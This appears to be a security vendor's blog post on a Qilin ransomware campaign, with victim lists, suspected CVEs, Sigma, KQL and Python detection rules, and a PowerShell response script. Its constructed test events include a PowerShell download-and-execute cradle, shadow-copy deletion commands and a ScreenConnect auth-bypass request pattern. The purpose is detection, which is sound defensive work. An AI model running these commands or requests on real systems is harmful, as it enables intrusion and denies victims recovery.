
QILIN Ransomware: 15+ Victims in 48-Hour Blitz — US Healthcare & Manufacturing Under Siege

Security Arsenal Team
May 30, 2026
7 min read

Aliases: Agenda (the name under which the operation first surfaced); Qilin.B refers to a later variant of the encryptor.

Operational Model: Ransomware-as-a-Service (RaaS). Qilin runs an aggressive affiliate program. The encryptor, originally written in Go under the Agenda name, was later rewritten in Rust, which gives affiliates Windows and Linux/ESXi builds from one code base and makes the binaries harder to reverse engineer.

Ransom Demands: Highly variable, typically between $500,000 and $5 million USD, calibrated to the victim's revenue and the sensitivity of the exfiltrated data.

Initial Access Vectors:

  • Exploited Vulnerabilities: Heavy reliance on internet-facing applications (e.g., ConnectWise ScreenConnect, Microsoft Exchange, VPN appliances).
  • Phishing: Credential-harvesting campaigns that yield the initial foothold.
  • Valid Credentials: Brute force and password spraying against RDP and VPN endpoints exposed to the internet, followed by an ordinary logon with the recovered credentials.

Tactics: Double extortion. Qilin affiliates exfiltrate large volumes of data before encrypting, typically with Rclone or the MEGA client (MEGAsync), use Cobalt Strike beacons for lateral movement, and lean on "Living off the Land" binaries (LOLBins) to evade detection.

Dwell Time: Short. Recent intelligence puts the interval between initial access and detonation at 3–7 days, a "smash-and-grab" tempo that leaves defenders little time to catch the intrusion once the foothold exists.


Current Campaign Analysis

Campaign Timeline: May 27–28, 2026

Sectors Targeted: Qilin has demonstrated a distinct pivot towards critical services and mid-market supply chain entities in this wave:

  • Healthcare (30%): Mindpath College Health, Providence Medical Group, Dillon Family Medicine.
  • Manufacturing (20%): Sinomax USA, Carton Craft Supply, LA Woodworks.
  • Business Services (20%): Gallun Snow Associates, Kennedy, McLaughlin & Associates, Mainstreet Organization of REALTORS.
  • Education: Alamo Heights School District.

Geographic Concentration: The United States is the primary target zone, accounting for over 70% of the recent postings; the other countries seen in this wave are AU, DK, LA, SA, HU and GB. This suggests affiliates are specifically targeting Western economies with a higher propensity to pay.

Victim Profile: The victim list indicates a focus on Small-to-Medium Businesses (SMBs) and regional entities. These organizations often lack the dedicated 24/7 SOC coverage required to detect the rapid lateral movement Qilin employs before detonation.

Escalation Patterns: Qilin published approximately 15 victims within a 48-hour window (May 27–28). A burst of this size suggests an automated exploitation tool or a single exploit (likely one of the CVEs below) being used to seed many victims at once. One caveat when reading leak-site velocity: a posting date marks when negotiations broke down, not when the intrusion occurred, so a 48-hour burst of postings can also be a batch of intrusions from the preceding weeks being released together.

Connection to CVEs (Initial Access Vectors): Based on the sectors hit (Healthcare, Business Services) rather than on artifacts recovered from these intrusions, we assess that Qilin affiliates are likely leveraging the following vulnerabilities from the CISA Known Exploited Vulnerabilities (KEV) catalog for initial access. Treat the mapping as a hypothesis to confirm against your own perimeter logs:

  • CVE-2024-1708 (ConnectWise ScreenConnect): Path traversal, chained in the wild with the CVE-2024-1709 authentication bypass (a POST to SetupWizard.aspx with a trailing slash); both were fixed in ScreenConnect 23.9.8. Highly probable vector for the Business Services victims, since ScreenConnect is ubiquitous in MSP environments managing the IT infrastructure of the targeted small businesses.
  • CVE-2023-21529 (Microsoft Exchange): A probable vector for Healthcare and Education victims, which frequently rely on on-premise Exchange servers.
  • CVE-2026-20131 (Cisco Secure Firewall): A critical perimeter bypass vector allowing access to internal networks regardless of VPN patch status.
  • CVE-2026-48027 (Nx Console): A software supply chain vulnerability likely used in technology/manufacturing sectors utilizing specific development consoles.

Detection Engineering

SIGMA Rules

YAML
---
title: ScreenConnect Authentication Bypass / Path Traversal Exploitation
id: c1c8b4d0-5e6f-4a2b-9e1c-8d9f0a1b2c3d
description: Detects the ConnectWise ScreenConnect exploitation pattern seen in recent Qilin campaigns. CVE-2024-1709 is the authentication bypass (POST to SetupWizard.aspx with a trailing slash); CVE-2024-1708 is the chained path traversal that writes a web shell handler under App_Extensions. Requires request logging from the ScreenConnect web server (IIS logs when hosted under IIS).
status: experimental
date: 2026-05-30
author: Security Arsenal Research
references:
    - https://www.cisa.gov/known-exploited-vulnerabilities-catalog
logsource:
    category: webserver
detection:
    selection_bypass:
        cs-method: 'POST'
        cs-uri-query|contains: '/SetupWizard.aspx/'
    selection_extension_drop:
        cs-uri-query|contains: '/App_Extensions/'
        cs-uri-query|endswith:
            - '.ashx'
            - '.aspx'
    condition: 1 of selection_*
falsepositives:
    - Initial setup of a freshly installed server (SetupWizard.aspx without the trailing slash is legitimate)
    - Legitimately installed extensions are also served from App_Extensions; tune on the extension GUIDs in use
level: high
tags:
    - attack.initial_access
    - attack.t1190
    - cve.2024.1708
    - cve.2024.1709
    - qilin

---
title: Suspicious PowerShell Encoded Command Payload
id: a2b3c4d5-e6f7-8a9b-0c1d-2e3f4a5b6c7d
description: Detects base64-encoded PowerShell command lines, used by Qilin affiliates to download payloads or execute lateral movement scripts. powershell.exe accepts -e, -ec and any unambiguous prefix of -EncodedCommand (-en, -enc, ...), so matching only ' -Enc ' misses most real-world usage.
status: experimental
date: 2026-05-30
author: Security Arsenal Research
logsource:
    product: windows
    category: process_creation
detection:
    selection:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains:
            - ' -e '
            - ' -ec '
            - ' -en '
            - ' -enc '
            - ' -enco'
    filter_legit:
        CommandLine|contains:
            - 'ManagementAgent'
            - 'Update-Help'
    condition: selection and not filter_legit
falsepositives:
    - System management scripts and agents that pass encoded commands; tune filter_legit on their parent process
    - Scripts that take their own '-e' parameter
level: high
tags:
    - attack.execution
    - attack.t1059.001
    - qilin

---
title: Ransomware Pre-Encryption Shadow Copy Deletion
id: d4e5f6a7-b8c9-40d1-82e3-4f5a6b7c8d9e
description: Detects deletion of volume shadow copies via vssadmin, wmic, diskshadow or WMI from PowerShell, a key Qilin TTP before encryption to deny recovery. Expect a single hit per host; encryptors typically run it once.
status: experimental
date: 2026-05-30
author: Security Arsenal Research
logsource:
    product: windows
    category: process_creation
detection:
    selection_vssadmin:
        Image|endswith: '\vssadmin.exe'
        CommandLine|contains: 'delete shadows'
    selection_wmic:
        Image|endswith: '\wmic.exe'
        CommandLine|contains|all:
            - 'shadowcopy'
            - 'delete'
    selection_diskshadow:
        Image|endswith: '\diskshadow.exe'
        CommandLine|contains: 'delete shadows'
    selection_powershell:
        Image|endswith:
            - '\powershell.exe'
            - '\pwsh.exe'
        CommandLine|contains|all:
            - 'Win32_ShadowCopy'
            - 'Delete'
    condition: 1 of selection_*
falsepositives:
    - Backup software or storage administrators pruning shadow copies (rare; verify the parent process)
level: critical
tags:
    - attack.impact
    - attack.t1490
    - qilin
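
The three rules above are easier to reason about when run over concrete events. The following is an added example, not Security Arsenal's code and not part of the original page, written in Python rather than a SIEM query language so it can be run anywhere. It applies the same three detections to constructed inputs: W3C-style web log lines (client addresses from documentation ranges), process-creation events with made-up hostnames, and a download cradle that is base64/UTF-16LE encoded at runtime to stand in for a real -EncodedCommand payload. It also carries the two caveats a practitioner hits first: legitimate ScreenConnect extensions live under App_Extensions too, so that path is only flagged for a client that already performed the SetupWizard bypass, and powershell.exe accepts prefixes of -EncodedCommand, so the decoder checks the flag rather than a fixed string.

```python
import base64
import re

# ---- Constructed sample data (not real telemetry) ---------------------------
# Web-server log lines, W3C style: date time client method uri status.
WEB_LOG = """\
2026-05-27 02:11:08 203.0.113.7 POST /SetupWizard.aspx/ 200
2026-05-27 02:11:09 203.0.113.7 POST /Administration 200
2026-05-27 02:12:02 203.0.113.7 GET /App_Extensions/8a8e8d7c-0000-4000-8000-000000000001/Service.ashx 200
2026-05-27 08:30:15 198.51.100.4 GET /Host 200
2026-05-27 08:30:16 198.51.100.4 GET /App_Extensions/2b6b7b6e-0000-4000-8000-000000000002/Service.ashx 200
"""


def build_sample_events():
    """Constructed process-creation events. The cradle is encoded here the way
    powershell.exe expects for -EncodedCommand (UTF-16LE, then base64)."""
    cradle = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a.ps1')"
    blob = base64.b64encode(cradle.encode("utf-16-le")).decode("ascii")
    return [
        {"host": "WS-042", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": "powershell.exe -nop -w hidden -enc " + blob},
        {"host": "WS-042", "image": r"C:\Windows\System32\wbem\WMIC.exe",
         "cmdline": "wmic shadowcopy delete"},
        {"host": "SRV-DB1", "image": r"C:\Windows\System32\vssadmin.exe",
         "cmdline": "vssadmin delete shadows /all /quiet"},
        {"host": "WS-007", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Update-Help.ps1"},
    ]


# ---- Rule 1: ScreenConnect exploitation in web logs --------------------------
SETUP_WIZARD_BYPASS = re.compile(r"(?i)/setupwizard\.aspx/")  # the trailing slash is the bypass
APP_EXTENSIONS_HANDLER = re.compile(r"(?i)/app_extensions/.+\.(?:ashx|aspx)$")


def screenconnect_hits(log_text):
    """POST to SetupWizard.aspx/ (CVE-2024-1709), then a handler under App_Extensions
    (where the CVE-2024-1708 traversal drops a web shell) from the same client."""
    bypass_clients = set()
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 6:
            continue
        client, method, uri = fields[2], fields[3], fields[4]
        path = uri.split("?", 1)[0]
        if method.upper() == "POST" and SETUP_WIZARD_BYPASS.search(path):
            bypass_clients.add(client)
            hits.append((client, "setupwizard-bypass", path))
        elif APP_EXTENSIONS_HANDLER.search(path) and client in bypass_clients:
            # Installed extensions are served from App_Extensions as well, so the path
            # alone is noise; only a client that already hit the bypass is flagged.
            hits.append((client, "app-extensions-after-bypass", path))
    return hits


# ---- Rule 2: encoded PowerShell -----------------------------------------------
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if the line has none.
    powershell.exe accepts -e, -ec and any prefix of -EncodedCommand (-en, -enc, ...)."""
    for flag, blob in ENC_FLAG.findall(cmdline):
        flag = flag.lower()
        if flag != "ec" and not "encodedcommand".startswith(flag):
            continue  # e.g. -ExecutionPolicy
        try:
            return base64.b64decode(blob, validate=True).decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            return None
    return None


# ---- Rule 3: shadow copy deletion -----------------------------------------------
# Per binary, every substring that must appear in the (lower-cased) command line.
SHADOW_DELETE = {
    "vssadmin.exe": ("delete shadows",),
    "wmic.exe": ("shadowcopy", "delete"),
    "diskshadow.exe": ("delete shadows",),
    "powershell.exe": ("win32_shadowcopy", "delete"),  # covers the .Delete() WMI idiom
    "pwsh.exe": ("win32_shadowcopy", "delete"),
}


def is_shadow_copy_deletion(image, cmdline):
    exe = image.rsplit("\\", 1)[-1].lower()
    cl = " ".join(cmdline.lower().split())  # collapse repeated whitespace
    return exe in SHADOW_DELETE and all(p in cl for p in SHADOW_DELETE[exe])


def triage(events):
    """Apply rules 2 and 3 to process events; returns (host, rule, detail) tuples."""
    findings = []
    for ev in events:
        exe = ev["image"].rsplit("\\", 1)[-1].lower()
        if exe in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(ev["cmdline"])
            if decoded is not None:
                findings.append((ev["host"], "encoded-powershell", decoded))
        if is_shadow_copy_deletion(ev["image"], ev["cmdline"]):
            findings.append((ev["host"], "shadow-copy-deletion", ev["cmdline"]))
    return findings


if __name__ == "__main__":
    for hit in screenconnect_hits(WEB_LOG):
        print("WEB ", *hit)
    for finding in triage(build_sample_events()):
        print("PROC", *finding)
```

Run as-is it reports the bypass and the follow-on App_Extensions request from 203.0.113.7, the decoded download cradle on WS-042, and the two shadow copy deletions; the second client's extension request and the plain -ExecutionPolicy invocation produce nothing. Decoding the payload is the step that turns an "encoded PowerShell" alert into a triage decision, since the decoded text is what reveals the staging server.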

KQL (Microsoft Sentinel)

// Hunt for lateral movement and data-staging indicators associated with Qilin affiliates.
// DeviceProcessEvents is the Defender for Endpoint advanced hunting table; it is available in
// Sentinel through the Microsoft 365 Defender connector.
// Focuses on PsExec/WMIC remote execution, copy/move over UNC paths, interactive RDP and
// known exfiltration tooling. Encoded PowerShell is left to the Sigma rule above so that
// every powershell.exe launch does not land in this query.
let TimeFrame = 1d;
let LateralTools = dynamic(['psexec.exe', 'psexec64.exe', 'paexec.exe', 'mstsc.exe']);
let StagingTools = dynamic(['rclone.exe', 'megasync.exe', 'megacmd.exe', 'winscp.exe']);
DeviceProcessEvents
| where Timestamp >= ago(TimeFrame)
| where FileName in~ (LateralTools)
    or FileName in~ (StagingTools)
    // wmic remote process creation: wmic /node:<host> process call create "..."
    or (FileName =~ 'wmic.exe' and ProcessCommandLine has_all ('/node:', 'process', 'call', 'create'))
    // copy/move/xcopy/robocopy involving a UNC path (\\server\share): staging over SMB
    or (ProcessCommandLine contains @'\\' and ProcessCommandLine has_any ('copy', 'move', 'xcopy', 'robocopy'))
| summarize Count = count(), ArgSet = make_set(ProcessCommandLine, 25)
    by DeviceName, FileName, AccountName
// The count threshold trims admin noise; any hit on the staging tools is worth a look regardless.
| where Count > 5 or FileName in~ (StagingTools)
| order by Count desc

PowerShell Response Script

PowerShell
<#
.SYNOPSIS
    Qilin Ransomware Rapid Response Check
.DESCRIPTION
    Checks for recently registered scheduled tasks (persistence),
    Volume Shadow Copy status and deletion attempts (recovery denial),
    and active interactive sessions (lateral movement).
    Run from an elevated prompt: vssadmin and the Security log need it.
#>

Write-Host "[+] Starting Qilin TTP Hunt..." -ForegroundColor Cyan

$principal = [Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()
if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
    Write-Host "WARNING: Not elevated. Shadow copy and Security log checks will be incomplete." -ForegroundColor Yellow
}
$cutoff = (Get-Date).AddDays(-7)

# 1. Scheduled tasks registered in the last 7 days (Persistence).
#    The Date property is the <Date> string from the task XML and is empty for many
#    built-in tasks, so cast it before comparing (-as returns $null when it does not parse).
Write-Host "[1] Checking for recently created Scheduled Tasks (Last 7 Days)..." -ForegroundColor Yellow
$schTasks = Get-ScheduledTask | Where-Object { $_.Date -and (($_.Date -as [datetime]) -gt $cutoff) }
if ($schTasks) {
    Write-Host "ALERT: Found recently created scheduled tasks:" -ForegroundColor Red
    $schTasks |
        Select-Object TaskName, Date, Author, TaskPath,
            @{ Name = 'Action'; Expression = { ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; ' } } |
        Format-Table -AutoSize
} else {
    Write-Host "No suspicious recent tasks found." -ForegroundColor Green
}

# 2. Volume Shadow Copy status (Recovery Check).
Write-Host "[2] Checking Volume Shadow Copy Status..." -ForegroundColor Yellow
try {
    $vss = @(vssadmin list shadows 2>&1 | Select-String "Shadow Copy Volume")
    if ($vss.Count -eq 0) {
        Write-Host "CRITICAL: NO Shadow Copies found. They may have been deleted." -ForegroundColor Red
    } else {
        Write-Host "Shadow Copies present ($($vss.Count) instances)." -ForegroundColor Green
    }
} catch {
    Write-Host "Error checking VSS: $_" -ForegroundColor Gray
}

# 2b. Deletion attempts in the process creation audit trail (Security Event ID 4688).
#     The command line only appears in the event when command-line auditing is enabled.
$vssEvents = Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4688; StartTime = $cutoff } -ErrorAction SilentlyContinue |
    Where-Object { $_.Message -match 'vssadmin.*delete shadows|wmic.*shadowcopy.*delete|Win32_ShadowCopy' }
if ($vssEvents) {
    Write-Host "ALERT: Shadow copy deletion commands found in the Security log:" -ForegroundColor Red
    $vssEvents | Select-Object TimeCreated, Message | Format-List
}

# 3. Active interactive/RDP sessions (Lateral Movement). query.exe (quser) exists on
#    workstation and server SKUs; it writes to stderr when nobody is logged on.
Write-Host "[3] Enumerating Active Sessions..." -ForegroundColor Yellow
$sessions = & query user 2>$null
if ($sessions) {
    Write-Host "Active Sessions Found (check for unexpected accounts and logon times):" -ForegroundColor Yellow
    $sessions
} else {
    Write-Host "No active interactive sessions." -ForegroundColor Green
}

Write-Host "[+] Hunt Complete." -ForegroundColor Cyan


---

Incident Response Priorities

T-Minus Detection Checklist (Pre-Encryption):

  1. Web Shell & Web Server Logs: Hunt the ScreenConnect web server logs (IIS logs when ScreenConnect is hosted under IIS) for POST requests to /SetupWizard.aspx/ with a trailing slash (the CVE-2024-1709 bypass) and for unexpected handlers appearing under /App_Extensions/ (the CVE-2024-1708 traversal drops the web shell there).
  2. Process Lineage: Monitor the web server process (w3wp.exe under IIS, or ScreenConnect.Service.exe) spawning cmd.exe or powershell.exe, the classic sign of web shell execution. services.exe spawning cmd.exe points instead at PsExec-style remote service execution during lateral movement and deserves the same attention.
  3. Large Outbound Transfers: Detect sudden spikes in per-host egress volume, including on the standard 80/443 ports where uploads blend into normal web traffic, and any bulk transfer to file-sharing services (MEGA, Dropbox) or from tools such as Rclone or WinSCP.
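
Item 3 is the check that most often fails in practice, because the threshold is set once for the whole estate rather than per host. The following added example, which is not from the original page or from Security Arsenal, shows one way to do it: a per-host hourly egress baseline with a spike test against the median of the preceding hours, plus a separate check for bulk uploads to consumer cloud storage. The flow summaries, hostnames, destinations and thresholds are all constructed assumptions; the domain list covers only the MEGA and Dropbox services named in the text and would be extended from your own proxy logs.

```python
from collections import defaultdict
from statistics import median

# Constructed hourly flow summaries (not real telemetry):
# (hour bucket, source host, destination, destination port, bytes out).
FLOWS = [
    ("2026-05-26T08", "FS-01", "backup.corp.example", 443, 900_000_000),
    ("2026-05-26T09", "FS-01", "updates.vendor.example", 443, 120_000_000),
    ("2026-05-26T10", "FS-01", "updates.vendor.example", 443, 95_000_000),
    ("2026-05-26T11", "FS-01", "backup.corp.example", 443, 850_000_000),
    ("2026-05-26T12", "FS-01", "updates.vendor.example", 443, 110_000_000),
    ("2026-05-27T01", "FS-01", "g.api.mega.co.nz", 443, 38_000_000_000),  # the staging upload
    ("2026-05-27T01", "FS-01", "backup.corp.example", 443, 870_000_000),
    ("2026-05-26T09", "WS-042", "dropbox.com", 443, 30_000_000),
    ("2026-05-26T10", "WS-042", "teams.microsoft.com", 443, 45_000_000),
    ("2026-05-26T11", "WS-042", "dropbox.com", 443, 25_000_000),
    ("2026-05-27T01", "WS-042", "dropbox.com", 443, 28_000_000),
]

# Assumed list; in production this comes from the proxy's own category data.
CLOUD_STORAGE_SUFFIXES = ("mega.co.nz", "mega.nz", "dropbox.com", "dropboxapi.com")


def is_cloud_storage(dst):
    d = dst.lower()
    return any(d == s or d.endswith("." + s) for s in CLOUD_STORAGE_SUFFIXES)


def hourly_egress(flows):
    """Return two maps, host -> {hour: bytes}: total egress and egress to cloud storage."""
    total = defaultdict(lambda: defaultdict(int))
    cloud = defaultdict(lambda: defaultdict(int))
    for hour, host, dst, _port, nbytes in flows:
        total[host][hour] += nbytes
        if is_cloud_storage(dst):
            cloud[host][hour] += nbytes
    return total, cloud


def exfil_findings(flows, spike_factor=10, min_bytes=1_000_000_000, min_baseline_hours=3):
    """Flag an hour when a host sends more than spike_factor times its own median of the
    preceding hours (and at least min_bytes), or sends min_bytes or more to cloud storage.
    Comparing each host to itself is what keeps a chatty file server from hiding a workstation."""
    total, cloud = hourly_egress(flows)
    findings = []
    for host, series in total.items():
        hours = sorted(series)  # ISO-style buckets sort chronologically as strings
        for i, hour in enumerate(hours):
            prior = [series[h] for h in hours[:i]]
            reasons = []
            if len(prior) >= min_baseline_hours:
                baseline = median(prior)
                if series[hour] >= min_bytes and series[hour] > spike_factor * baseline:
                    reasons.append(f"egress {series[hour] / baseline:.0f}x the host's hourly median")
            if cloud[host].get(hour, 0) >= min_bytes:
                reasons.append("bulk upload to consumer cloud storage")
            if reasons:
                findings.append({"host": host, "hour": hour, "bytes": series[hour], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in exfil_findings(FLOWS):
        print(f"{f['host']} {f['hour']} {f['bytes'] / 1e9:.1f} GB: {'; '.join(f['reasons'])}")
```

On the sample data only FS-01 at 01:00 on May 27 is reported, on both counts; the workstation's small daily Dropbox traffic stays under the byte floor. The byte floor matters as much as the ratio: without it, a host that is normally idle trips the spike test on a single software update. All of this traffic is on port 443, which is why the check is built on volume and destination rather than on port.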

Critical Assets Prioritized for Exfiltration:

  • Healthcare: Patient Health Information (PHI/EMR databases), insurance claim data.
  • Manufacturing: CAD drawings, proprietary formulas, client supply chain lists.
  • Business Services: Financial records (tax docs), client databases, legal contracts.

Containment Actions:

  1. Immediate Isolation: Disconnect compromised segments from the core network; do not reboot systems yet (volatile memory evidence).
  2. Block CVE Vectors: Restrict inbound access to the ScreenConnect web interface (at minimum, block requests to /SetupWizard.aspx/ at the reverse proxy or WAF) and upgrade to 23.9.8 or later, which fixes CVE-2024-1708 and CVE-2024-1709.
  3. Suspend Accounts: Suspend service accounts associated with the exploited applications (e.g., IIS service accounts, SQL service accounts).

Hardening Recommendations

Immediate (24h):

  • Patch CVE-2024-1708 and CVE-2024-1709: If running ConnectWise ScreenConnect, upgrade to 23.9.8 or later immediately, or disable external access to the server until patched.
  • Disable RDP: Disable internet-facing RDP. Require VPN (with MFA) for all remote administrative access.
  • Block Macros: Enforce policies to disable Office macros on documents originating from the internet.

Short-term (2 weeks):

  • Network Segmentation: Isolate critical backup systems from the production network. Qilin frequently targets backup agents to prevent recovery.
  • Implement MFA Everywhere: Specifically enforce phishing-resistant MFA (FIDO2) for VPNs, webmail, and remote management tools.
  • EDR Tuning: Ensure EDR solutions are monitoring for vssadmin deletion processes and PowerShell encoded command execution.
